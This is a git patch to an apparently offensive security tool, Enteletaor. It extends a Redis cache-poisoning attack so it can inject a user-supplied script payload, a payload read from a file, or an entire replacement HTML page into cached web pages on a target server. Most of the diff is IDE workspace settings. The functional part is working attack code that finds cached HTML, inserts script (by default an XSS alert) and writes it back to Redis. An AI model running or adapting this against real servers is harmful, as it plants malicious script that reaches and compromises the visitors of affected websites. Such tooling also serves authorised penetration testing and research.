From 0cf71412bebe9481d206d78e389cd7e10426f3e6 Mon Sep 17 00:00:00 2001
From: cr0hn <cr0hn@cr0hn.com>
Date: Thu, 18 Feb 2016 11:11:59 +0100
Subject: [PATCH] add - new options to inject into cache poisoning: payload
 from comand line, payload from file, complete new HTML file add - some visual
 improvements in argparser

---
 .idea/workspace.xml                          | 168 ++++++++++++-------
 enteletaor_lib/modules/proc/cmd_actions.py   |  10 +-
 enteletaor_lib/modules/redis/cmd_actions.py  |  30 +++-
 enteletaor_lib/modules/redis/redis_poison.py |  74 +++++---
 4 files changed, 179 insertions(+), 103 deletions(-)

diff --git a/.idea/workspace.xml b/.idea/workspace.xml
index acca5e0..feef1f5 100644
--- a/.idea/workspace.xml
+++ b/.idea/workspace.xml
@@ -1,13 +1,11 @@
 <?xml version="1.0" encoding="UTF-8"?>
 <project version="4">
   <component name="ChangeListManager">
-    <list default="true" id="f21e0167-ea6b-49ab-b506-bdd65f63e425" name="Default" comment="Minor fixes">
-      <change type="NEW" beforePath="" afterPath="$PROJECT_DIR$/enteletaor_lib/modules/redis/redis_poison.py" />
+    <list default="true" id="f21e0167-ea6b-49ab-b506-bdd65f63e425" name="Default" comment="">
       <change type="MODIFICATION" beforePath="$PROJECT_DIR$/.idea/workspace.xml" afterPath="$PROJECT_DIR$/.idea/workspace.xml" />
-      <change type="MODIFICATION" beforePath="$PROJECT_DIR$/enteletaor_lib/modules/__init__.py" afterPath="$PROJECT_DIR$/enteletaor_lib/modules/__init__.py" />
-      <change type="MODIFICATION" beforePath="$PROJECT_DIR$/enteletaor_lib/modules/redis/__init__.py" afterPath="$PROJECT_DIR$/enteletaor_lib/modules/redis/__init__.py" />
+      <change type="MODIFICATION" beforePath="$PROJECT_DIR$/enteletaor_lib/modules/proc/cmd_actions.py" afterPath="$PROJECT_DIR$/enteletaor_lib/modules/proc/cmd_actions.py" />
       <change type="MODIFICATION" beforePath="$PROJECT_DIR$/enteletaor_lib/modules/redis/cmd_actions.py" afterPath="$PROJECT_DIR$/enteletaor_lib/modules/redis/cmd_actions.py" />
-      <change type="MODIFICATION" beforePath="$PROJECT_DIR$/enteletaor_lib/modules/redis/redis_dump.py" afterPath="$PROJECT_DIR$/enteletaor_lib/modules/redis/redis_dump.py" />
+      <change type="MODIFICATION" beforePath="$PROJECT_DIR$/enteletaor_lib/modules/redis/redis_poison.py" afterPath="$PROJECT_DIR$/enteletaor_lib/modules/redis/redis_poison.py" />
     </list>
     <ignored path="Enteletaor.iws" />
     <ignored path=".idea/workspace.xml" />
@@ -25,7 +23,7 @@
     <SUITE FILE_PATH="coverage/Enteletaor$__init__.coverage" NAME="__init__ Coverage Results" MODIFIED="1453676626706" SOURCE_PROVIDER="com.intellij.coverage.DefaultCoverageFileProvider" RUNNER="coverage.py" COVERAGE_BY_TEST_ENABLED="true" COVERAGE_TRACING_ENABLED="false" WORKING_DIRECTORY="$USER_HOME$/Documents/Projects/Enteletaor/enteletaor_lib/modules" />
     <SUITE FILE_PATH="coverage/Enteletaor$enteletaor_module_redis_disconnect.coverage" NAME="enteletaor module redis disconnect Coverage Results" MODIFIED="1455631616654" SOURCE_PROVIDER="com.intellij.coverage.DefaultCoverageFileProvider" RUNNER="coverage.py" COVERAGE_BY_TEST_ENABLED="true" COVERAGE_TRACING_ENABLED="false" WORKING_DIRECTORY="$PROJECT_DIR$/enteletaor_lib" />
     <SUITE FILE_PATH="coverage/Enteletaor$enteletaor_proc_raw_dump.coverage" NAME="enteletaor proc raw-dump Coverage Results" MODIFIED="1455719827469" SOURCE_PROVIDER="com.intellij.coverage.DefaultCoverageFileProvider" RUNNER="coverage.py" COVERAGE_BY_TEST_ENABLED="true" COVERAGE_TRACING_ENABLED="false" WORKING_DIRECTORY="$PROJECT_DIR$/enteletaor_lib" />
-    <SUITE FILE_PATH="coverage/Enteletaor$enteletaor_module_redis_cache_poison.coverage" NAME="enteletaor module redis cache-poison Coverage Results" MODIFIED="1455758592277" SOURCE_PROVIDER="com.intellij.coverage.DefaultCoverageFileProvider" RUNNER="coverage.py" COVERAGE_BY_TEST_ENABLED="true" COVERAGE_TRACING_ENABLED="false" WORKING_DIRECTORY="$PROJECT_DIR$/enteletaor_lib" />
+    <SUITE FILE_PATH="coverage/Enteletaor$enteletaor_module_redis_cache_poison.coverage" NAME="enteletaor module redis cache-poison Coverage Results" MODIFIED="1455788650320" SOURCE_PROVIDER="com.intellij.coverage.DefaultCoverageFileProvider" RUNNER="coverage.py" COVERAGE_BY_TEST_ENABLED="true" COVERAGE_TRACING_ENABLED="false" WORKING_DIRECTORY="$PROJECT_DIR$/enteletaor_lib" />
     <SUITE FILE_PATH="coverage/Enteletaor$model.coverage" NAME="model Coverage Results" MODIFIED="1453853975150" SOURCE_PROVIDER="com.intellij.coverage.DefaultCoverageFileProvider" RUNNER="coverage.py" COVERAGE_BY_TEST_ENABLED="true" COVERAGE_TRACING_ENABLED="false" WORKING_DIRECTORY="$USER_HOME$/Documents/Projects/Enteletaor/enteletaor_lib/libs" />
     <SUITE FILE_PATH="coverage/Enteletaor$enteletaor_module_dump.coverage" NAME="enteletaor module redis dump Coverage Results" MODIFIED="1455640099415" SOURCE_PROVIDER="com.intellij.coverage.DefaultCoverageFileProvider" RUNNER="coverage.py" COVERAGE_BY_TEST_ENABLED="true" COVERAGE_TRACING_ENABLED="false" WORKING_DIRECTORY="$PROJECT_DIR$/enteletaor_lib" />
     <SUITE FILE_PATH="coverage/Enteletaor$enteletaor_web.coverage" NAME="enteletaor_web Coverage Results" MODIFIED="1453825208662" SOURCE_PROVIDER="com.intellij.coverage.DefaultCoverageFileProvider" RUNNER="coverage.py" COVERAGE_BY_TEST_ENABLED="true" COVERAGE_TRACING_ENABLED="false" WORKING_DIRECTORY="$USER_HOME$/Documents/Projects/Enteletaor" />
@@ -43,24 +41,60 @@
     <favorites_list name="Enteletaor" />
   </component>
   <component name="FileEditorManager">
-    <leaf>
-      <file leaf-file-name="redis_poison.py" pinned="false" current-in-tab="true">
-        <entry file="file://$PROJECT_DIR$/enteletaor_lib/modules/redis/redis_poison.py">
-          <provider selected="true" editor-type-id="text-editor">
-            <state vertical-scroll-proportion="0.27591464">
-              <caret line="66" column="0" selection-start-line="66" selection-start-column="0" selection-end-line="66" selection-end-column="0" />
-              <folding>
-                <element signature="e#24#39#0" expanded="true" />
-                <element signature="e#231#597#0" expanded="false" />
-                <element signature="e#698#816#0" expanded="false" />
-                <element signature="e#698#732#1" expanded="true" />
-                <element signature="e#924#957#1" expanded="true" />
-              </folding>
-            </state>
-          </provider>
-        </entry>
-      </file>
-    </leaf>
+    <splitter split-orientation="horizontal" split-proportion="0.5">
+      <split-first>
+        <leaf>
+          <file leaf-file-name="redis_poison.py" pinned="false" current-in-tab="true">
+            <entry file="file://$PROJECT_DIR$/enteletaor_lib/modules/redis/redis_poison.py">
+              <provider selected="true" editor-type-id="text-editor">
+                <state vertical-scroll-proportion="-0.94871795">
+                  <caret line="90" column="84" selection-start-line="90" selection-start-column="84" selection-end-line="90" selection-end-column="84" />
+                  <folding>
+                    <element signature="e#25#37#0" expanded="true" />
+                    <element signature="e#205#571#0" expanded="false" />
+                    <element signature="e#672#790#0" expanded="false" />
+                    <element signature="e#672#706#1" expanded="true" />
+                    <element signature="e#898#931#1" expanded="true" />
+                    <element signature="e#2962#2998#1" expanded="true" />
+                  </folding>
+                </state>
+              </provider>
+            </entry>
+          </file>
+        </leaf>
+      </split-first>
+      <split-second>
+        <leaf>
+          <file leaf-file-name="redis_poison.py" pinned="false" current-in-tab="false">
+            <entry file="file://$PROJECT_DIR$/enteletaor_lib/modules/redis/redis_poison.py">
+              <provider selected="true" editor-type-id="text-editor">
+                <state vertical-scroll-proportion="0.0">
+                  <caret line="148" column="20" selection-start-line="148" selection-start-column="20" selection-end-line="148" selection-end-column="20" />
+                  <folding>
+                    <element signature="e#672#790#0" expanded="false" />
+                    <element signature="e#672#706#1" expanded="true" />
+                    <element signature="e#898#931#1" expanded="true" />
+                    <element signature="e#2962#2998#1" expanded="true" />
+                    <marker date="1455790160000" expanded="true" signature="25:76" placeholder="import ..." />
+                    <marker date="1455790160000" expanded="true" signature="896:2839" placeholder="..." />
+                  </folding>
+                </state>
+              </provider>
+            </entry>
+          </file>
+          <file leaf-file-name="cmd_actions.py" pinned="false" current-in-tab="true">
+            <entry file="file://$PROJECT_DIR$/enteletaor_lib/modules/redis/cmd_actions.py">
+              <provider selected="true" editor-type-id="text-editor">
+                <state vertical-scroll-proportion="0.32478634">
+                  <caret line="20" column="0" selection-start-line="20" selection-start-column="0" selection-end-line="20" selection-end-column="0" />
+                  <folding />
+                </state>
+              </provider>
+            </entry>
+          </file>
+        </leaf>
+      </split-second>
+    </splitter>
   </component>
   <component name="FileTemplateManagerImpl">
     <option name="RECENT_TEMPLATES">
@@ -119,7 +153,6 @@
         <option value="$PROJECT_DIR$/enteletaor_lib/modules/redis/redis_disconnect.py" />
         <option value="$PROJECT_DIR$/enteletaor_lib/modules/redis/redis_discover_db.py" />
         <option value="$PROJECT_DIR$/enteletaor_lib/modules/proc/proc_dump.py" />
-        <option value="$PROJECT_DIR$/enteletaor_lib/modules/proc/cmd_actions.py" />
         <option value="$PROJECT_DIR$/ATTACKS.md" />
         <option value="$PROJECT_DIR$/enteletaor_lib/modules/proc/__init__.py" />
         <option value="$PROJECT_DIR$/.gitignore" />
@@ -127,6 +160,7 @@
         <option value="$PROJECT_DIR$/enteletaor_lib/modules/redis/redis_dump.py" />
         <option value="$PROJECT_DIR$/enteletaor_lib/modules/__init__.py" />
         <option value="$PROJECT_DIR$/enteletaor_lib/modules/redis/__init__.py" />
+        <option value="$PROJECT_DIR$/enteletaor_lib/modules/proc/cmd_actions.py" />
         <option value="$PROJECT_DIR$/enteletaor_lib/modules/redis/cmd_actions.py" />
         <option value="$PROJECT_DIR$/enteletaor_lib/modules/redis/redis_poison.py" />
       </list>
@@ -140,8 +174,8 @@
   <component name="ProjectFrameBounds">
     <option name="x" value="4" />
     <option name="y" value="23" />
-    <option name="width" value="1276" />
-    <option name="height" value="777" />
+    <option name="width" value="1916" />
+    <option name="height" value="1057" />
   </component>
   <component name="ProjectLevelVcsManager" settingsEditedManually="false">
     <OptionsSetting value="true" id="Add" />
@@ -659,11 +693,17 @@
       <option name="project" value="LOCAL" />
       <updated>1455720146783</updated>
     </task>
-    <option name="localTasksCounter" value="5" />
+    <task id="LOCAL-00005" summary="Add: new redis attack - cache poison">
+      <created>1455759358999</created>
+      <option name="number" value="00005" />
+      <option name="project" value="LOCAL" />
+      <updated>1455759358999</updated>
+    </task>
+    <option name="localTasksCounter" value="6" />
     <servers />
   </component>
   <component name="ToolWindowManager">
-    <frame x="4" y="23" width="1276" height="777" extended-state="6" />
+    <frame x="4" y="23" width="1916" height="1057" extended-state="6" />
     <editor active="true" />
     <layout>
       <window_info id="TODO" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="6" side_tool="false" content_ui="tabs" />
@@ -673,12 +713,12 @@
       <window_info id="Version Control" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.32953367" sideWeight="0.5" order="7" side_tool="false" content_ui="tabs" />
       <window_info id="Run" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.3562044" sideWeight="0.4946581" order="2" side_tool="false" content_ui="tabs" />
       <window_info id="Terminal" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.34818652" sideWeight="0.4957265" order="7" side_tool="false" content_ui="tabs" />
-      <window_info id="Project" active="false" anchor="left" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.22564936" sideWeight="0.5" order="0" side_tool="false" content_ui="tabs" />
+      <window_info id="Project" active="false" anchor="left" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.22542734" sideWeight="0.5" order="0" side_tool="false" content_ui="tabs" />
       <window_info id="Database" active="false" anchor="right" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="3" side_tool="false" content_ui="tabs" />
       <window_info id="Find" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.32746115" sideWeight="0.4957265" order="1" side_tool="false" content_ui="tabs" />
       <window_info id="Structure" active="false" anchor="left" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.25" sideWeight="0.5" order="1" side_tool="false" content_ui="tabs" />
       <window_info id="Favorites" active="false" anchor="left" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="2" side_tool="true" content_ui="tabs" />
-      <window_info id="Debug" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.4729927" sideWeight="0.491453" order="3" side_tool="false" content_ui="tabs" />
+      <window_info id="Debug" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.4310881" sideWeight="0.491453" order="3" side_tool="false" content_ui="tabs" />
       <window_info id="Cvs" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.25" sideWeight="0.5" order="4" side_tool="false" content_ui="tabs" />
       <window_info id="Message" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="0" side_tool="false" content_ui="tabs" />
       <window_info id="Commander" active="false" anchor="right" auto_hide="false" internal_type="SLIDING" type="SLIDING" visible="false" show_stripe_button="true" weight="0.4" sideWeight="0.5" order="0" side_tool="false" content_ui="tabs" />
@@ -703,7 +743,8 @@
     <MESSAGE value="Fix: A lot of improvements in framework.&#10;Add: 5 new attacks in redis module" />
     <MESSAGE value="Minor fixes" />
     <MESSAGE value="add: new attack family - proc&#10;add: new attack for redis- discover-dbs" />
-    <option name="LAST_COMMIT_MESSAGE" value="add: new attack family - proc&#10;add: new attack for redis- discover-dbs" />
+    <MESSAGE value="Add: new redis attack - cache poison" />
+    <option name="LAST_COMMIT_MESSAGE" value="Add: new redis attack - cache poison" />
   </component>
   <component name="XDebuggerManager">
     <breakpoint-manager>
@@ -724,7 +765,7 @@
           </properties>
         </breakpoint>
       </default-breakpoints>
-      <option name="time" value="279" />
+      <option name="time" value="285" />
     </breakpoint-manager>
     <watches-manager>
       <configuration name="PythonConfigurationType">
@@ -1209,14 +1250,6 @@
         </state>
       </provider>
     </entry>
-    <entry file="file://$PROJECT_DIR$/enteletaor_lib/modules/proc/cmd_actions.py">
-      <provider selected="true" editor-type-id="text-editor">
-        <state vertical-scroll-proportion="0.33709678">
-          <caret line="13" column="0" selection-start-line="13" selection-start-column="0" selection-end-line="13" selection-end-column="0" />
-          <folding />
-        </state>
-      </provider>
-    </entry>
     <entry file="file://$PROJECT_DIR$/enteletaor_lib/api.py">
       <provider selected="true" editor-type-id="text-editor">
         <state vertical-scroll-proportion="0.18387097">
@@ -1273,19 +1306,7 @@
         <state vertical-scroll-proportion="0.2682927">
           <caret line="41" column="0" selection-start-line="41" selection-start-column="0" selection-end-line="41" selection-end-column="0" />
           <folding>
-            <element signature="e#25#35#0" expanded="true" />
-          </folding>
-        </state>
-      </provider>
-    </entry>
-    <entry file="file://$PROJECT_DIR$/enteletaor_lib/modules/redis/__init__.py">
-      <provider selected="true" editor-type-id="text-editor">
-        <state vertical-scroll-proportion="0.38832998">
-          <caret line="43" column="39" selection-start-line="43" selection-start-column="39" selection-end-line="43" selection-end-column="39" />
-          <folding>
-            <element signature="e#25#39#0" expanded="true" />
-            <element signature="e#772#904#0" expanded="false" />
-            <element signature="e#1009#1067#1" expanded="true" />
+            <element signature="e#25#35#0" expanded="false" />
           </folding>
         </state>
       </provider>
@@ -1300,24 +1321,45 @@
         </state>
       </provider>
     </entry>
+    <entry file="file://$PROJECT_DIR$/enteletaor_lib/modules/proc/cmd_actions.py">
+      <provider selected="true" editor-type-id="text-editor">
+        <state vertical-scroll-proportion="0.16239317">
+          <caret line="10" column="4" selection-start-line="10" selection-start-column="4" selection-end-line="10" selection-end-column="4" />
+          <folding />
+        </state>
+      </provider>
+    </entry>
+    <entry file="file://$PROJECT_DIR$/enteletaor_lib/modules/redis/__init__.py">
+      <provider selected="true" editor-type-id="text-editor">
+        <state vertical-scroll-proportion="0.3707265">
+          <caret line="42" column="27" selection-start-line="42" selection-start-column="27" selection-end-line="42" selection-end-column="27" />
+          <folding>
+            <element signature="e#25#39#0" expanded="true" />
+            <element signature="e#772#904#0" expanded="false" />
+            <element signature="e#1009#1067#1" expanded="true" />
+          </folding>
+        </state>
+      </provider>
+    </entry>
     <entry file="file://$PROJECT_DIR$/enteletaor_lib/modules/redis/cmd_actions.py">
       <provider selected="true" editor-type-id="text-editor">
-        <state vertical-scroll-proportion="0.40140846">
-          <caret line="8" column="5" selection-start-line="8" selection-start-column="5" selection-end-line="8" selection-end-column="5" />
+        <state vertical-scroll-proportion="0.32478634">
+          <caret line="20" column="0" selection-start-line="20" selection-start-column="0" selection-end-line="20" selection-end-column="0" />
           <folding />
         </state>
       </provider>
     </entry>
     <entry file="file://$PROJECT_DIR$/enteletaor_lib/modules/redis/redis_poison.py">
       <provider selected="true" editor-type-id="text-editor">
-        <state vertical-scroll-proportion="0.27591464">
-          <caret line="66" column="0" selection-start-line="66" selection-start-column="0" selection-end-line="66" selection-end-column="0" />
+        <state vertical-scroll-proportion="-0.94871795">
+          <caret line="90" column="84" selection-start-line="90" selection-start-column="84" selection-end-line="90" selection-end-column="84" />
           <folding>
-            <element signature="e#24#39#0" expanded="true" />
-            <element signature="e#231#597#0" expanded="false" />
-            <element signature="e#698#816#0" expanded="false" />
-            <element signature="e#698#732#1" expanded="true" />
-            <element signature="e#924#957#1" expanded="true" />
+            <element signature="e#25#37#0" expanded="true" />
+            <element signature="e#205#571#0" expanded="false" />
+            <element signature="e#672#790#0" expanded="false" />
+            <element signature="e#672#706#1" expanded="true" />
+            <element signature="e#898#931#1" expanded="true" />
+            <element signature="e#2962#2998#1" expanded="true" />
           </folding>
         </state>
       </provider>
diff --git a/enteletaor_lib/modules/proc/cmd_actions.py b/enteletaor_lib/modules/proc/cmd_actions.py
index a21aa9f..6048efe 100644
--- a/enteletaor_lib/modules/proc/cmd_actions.py
+++ b/enteletaor_lib/modules/proc/cmd_actions.py
@@ -7,7 +7,9 @@ This file contains command line actions for argparser
 
 # ----------------------------------------------------------------------
 def parser_proc_raw_dump(parser):
-	parser.add_argument("--tail", action="store_true", dest="tail_mode", default=False,
-	                    help="although all information be dumped do not stop")
-	parser.add_argument("-I", dest="interval", type=float, default=4,
-	                    help="timeout interval between tow connections")
+	gr = parser.add_argument_group("custom raw dump options")
+
+	gr.add_argument("--tail", action="store_true", dest="tail_mode", default=False,
+	                help="although all information be dumped do not stop")
+	gr.add_argument("-I", dest="interval", type=float, default=4,
+	                help="timeout interval between tow connections")
diff --git a/enteletaor_lib/modules/redis/cmd_actions.py b/enteletaor_lib/modules/redis/cmd_actions.py
index 3bca404..c8e41a0 100644
--- a/enteletaor_lib/modules/redis/cmd_actions.py
+++ b/enteletaor_lib/modules/redis/cmd_actions.py
@@ -10,21 +10,33 @@ def parser_redis_dump(parser):
 	"""
 	Dump all redis database information
 	"""
-	parser.add_argument("--no-raw", action="store_true", dest="no_raw", default=False,
-	                    help="do not show displays raw database info into screen")
+	gr = parser.add_argument_group("custom raw dump options")
+	gr.add_argument("--no-raw", action="store_true", dest="no_raw", default=False,
+	                help="do not show displays raw database info into screen")
 
 
 # ----------------------------------------------------------------------
 def parser_redis_server_disconnect(parser):
-	parser.add_argument("-c", action="store", dest="client", help="user to disconnect")
-	parser.add_argument("--all", action="store_true", dest="disconnect_all", default=False,
-	                    help="disconnect all users")
+	gr = parser.add_argument_group("custom disconnect options")
+
+	gr.add_argument("-c", action="store", dest="client", help="user to disconnect")
+	gr.add_argument("--all", action="store_true", dest="disconnect_all", default=False,
+	                help="disconnect all users")
 
 
 # ----------------------------------------------------------------------
 def parser_redis_server_cache_poison(parser):
-	parser.add_argument("--search", action="store_true", dest="search_cache", default=False,
-	                    help="try to find cache info stored in Redis")
-	parser.add_argument("--cache-key", action="store", dest="cache_key",
-	                    help="try to poisoning using selected key")
+	gr = parser.add_argument_group("custom poison options")
 
+	gr.add_argument("--search", action="store_true", dest="search_cache", default=False,
+	                help="try to find cache info stored in Redis")
+	gr.add_argument("--cache-key", action="store", dest="cache_key",
+	                help="try to poisoning using selected key")
+
+	payload = parser.add_argument_group("payloads options")
+	payload.add_argument("--payload", action="store", dest="poison_payload",
+	                     help="try inject cmd inline payload")
+	payload.add_argument("--file-payload", action="store", dest="poison_payload_file",
+	                     help="try inject selected payload reading from a file")
+	payload.add_argument("--replace-html", action="store", dest="new_html",
+	                     help="replace cache content with selected file content")
diff --git a/enteletaor_lib/modules/redis/redis_poison.py b/enteletaor_lib/modules/redis/redis_poison.py
index 4d33789..b331af8 100644
--- a/enteletaor_lib/modules/redis/redis_poison.py
+++ b/enteletaor_lib/modules/redis/redis_poison.py
@@ -1,6 +1,5 @@
 # -*- coding: utf-8 -*-
-import binascii
-import six
+
 import redis
 import logging
 
@@ -50,7 +49,14 @@ def handle_html(config, content):
 	"""
 
 	# --------------------------------------------------------------------------
-	# Prepare info
+	# Selected custom HTML file?
+	# --------------------------------------------------------------------------
+	if config.new_html is not None:
+		with open(config.new_html, "rU") as f:
+			return f.read()
+
+	# --------------------------------------------------------------------------
+	# Search start and end possition of HTML page
 	# --------------------------------------------------------------------------
 	for i, x in enumerate(content):
 		if chr(x) == "<":
@@ -63,10 +69,7 @@ def handle_html(config, content):
 			break
 
 	if pos_ini is None or pos_end is None:
-		return None
-
-	# prefix = content[:pos_ini]
-	# suffix = content[pos_end:]
+		raise ValueError("Not found HTML content into cache")
 
 	txt_content = content[pos_ini:pos_end]
 
@@ -74,31 +77,39 @@ def handle_html(config, content):
 	tree = etree.fromstring(txt_content, etree.HTMLParser())
 	doc_root = tree.getroottree()
 
-	# Find an insert script injection
-	for point in ("title", "body"):
+	results = None
+
+	# Search insertion points
+	for point in ("head", "title", "body", "script", "div", "p"):
 		insert_point = doc_root.find(".//%s" % point)
 
 		if insert_point is None:
 			continue
 
-		# Add the injection
-		ss = etree.Element("script")
-		ss.text = "alert(1)"
+		# --------------------------------------------------------------------------
+		# Add the injection Payload
+		# --------------------------------------------------------------------------
+		if config.poison_payload_file is not None:
+			with open(config.poison_payload_file, "rU") as f:
+				_f_payload = f.read()
+			payload = etree.fromstring(_f_payload)
 
-		insert_point.addnext(ss)
+		elif config.poison_payload:
+			payload = etree.fromstring(config.poison_payload)
+		else:
+			payload = "<script>alert('You're broker injection vulnerable')</script>"
+
+		insert_point.addnext(payload)
+
+		# Set results
+		results = bytes(etree.tostring(doc_root))
 
-		# Found and insert point -> break
 		break
 
 	# --------------------------------------------------------------------------
-	# Fix results
+	# Build results
 	# --------------------------------------------------------------------------
-
-	# Result
-	# result = bytearray(prefix) + bytearray(etree.tostring(doc_root)) + bytearray(suffix)
-
-	return bytes(etree.tostring(doc_root))
-	# return bytes(result)
+	return results
 
 
 # ----------------------------------------------------------------------
@@ -120,7 +131,7 @@ def action_redis_cache_poison(config):
 			cache_keys = [config.cache_key]
 
 	# --------------------------------------------------------------------------
-	# Find caches
+	# Find cache keys
 	# --------------------------------------------------------------------------
 	if config.search_cache is True:
 		log.error("Looking for caches in '%s'..." % config.target)
@@ -146,15 +157,24 @@ def action_redis_cache_poison(config):
 			continue
 
 		# --------------------------------------------------------------------------
-		# Action over caches
+		# Make actions over cache
 		# --------------------------------------------------------------------------
-		# Modify
-		modified = handle_html(config, content)
 
+		# Set injection
+		try:
+			modified = handle_html(config, content)
+		except ValueError as e:
+			log.error("Can't modify cache content: " % e)
+			continue
+		except IOError as e:
+			log.error("Can't modify cache content: " % e)
+
+		# Injection was successful?
 		if modified is None:
-			log.warning("Can't modify content")
+			log.warning("Can't modify content: ensure that content is HTML")
+			continue
 
-		# Reset information
+		# Set injection into server
 		con.setex(val, 200, modified)